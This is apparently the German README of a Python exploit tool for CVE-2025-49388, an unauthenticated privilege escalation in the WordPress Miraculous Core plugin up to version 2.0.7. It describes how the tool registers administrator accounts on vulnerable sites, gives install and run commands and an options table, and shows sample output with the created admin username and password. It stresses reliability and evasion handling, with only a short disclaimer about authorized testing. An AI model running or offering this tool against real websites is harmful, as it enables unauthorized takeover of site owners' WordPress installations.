
Miraculous Core (kamleshyadav) ≤ 2.0.7 — Nicht authentifizierte Rechteausweitung
WordPress Miraculous Core Plugin Plugin <= 2.0.7 ist anfällig für Privilege Escalation
Die Schwachstelle Incorrect Privilege Assignment im Miraculous Core Plugin von kamleshyadav ermöglicht es nicht authentifizierten Angreifern, ihre Privilegien auszuweiten und Administrator-Konten zu registrieren.
Betroffene Versionen: n/a bis 2.0.7
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (Bewertung noch nicht verfügbar)
Dieses Python-Skript automatisiert die Ausnutzung von CVE-2025-49388, indem es ein neues Administrator-Konto auf verwundbaren WordPress-Instanzen mit installiertem Miraculous Core Plugin registriert.
Es bietet hohe Zuverlässigkeit, randomisiert Daten für wiederholte zuverlässige Ausnutzung und verarbeitet automatisch Header, Cookies und Umgehungsversuche.
Abhängigkeiten installieren:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPTIONS]
Beispiel:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
Hinweis:
Wenn Sie Benutzername oder E-Mail weglassen, werden bei jedem Lauf zufällige Werte generiert, um Duplikatfehler zu vermeiden.
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
Dieses Tool wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.
Die unbefugte Ausnutzung von Systemen ohne ausdrückliche Genehmigung ist illegal und unethisch.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden. Verwenden Sie es verantwortungsvoll.
| Option | Beschreibung | Beispiel |
|---|
-u, --url | Ziel-WordPress-URL (erforderlich) | -u http://target.com/wordpress |
-un, --username | Gewünschter Benutzername (Standard: zufällig) | -un admin1337 |
-fn, --full_name | Vollständiger Name (Standard: Nxploited) | -fn "John Doe" |
-em, --useremail | E-Mail (Standard: zufällig) | -em [email protected] |
-pw, --password | Passwort (Standard: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | Ergebnisse in Datei protokollieren | -o result.txt |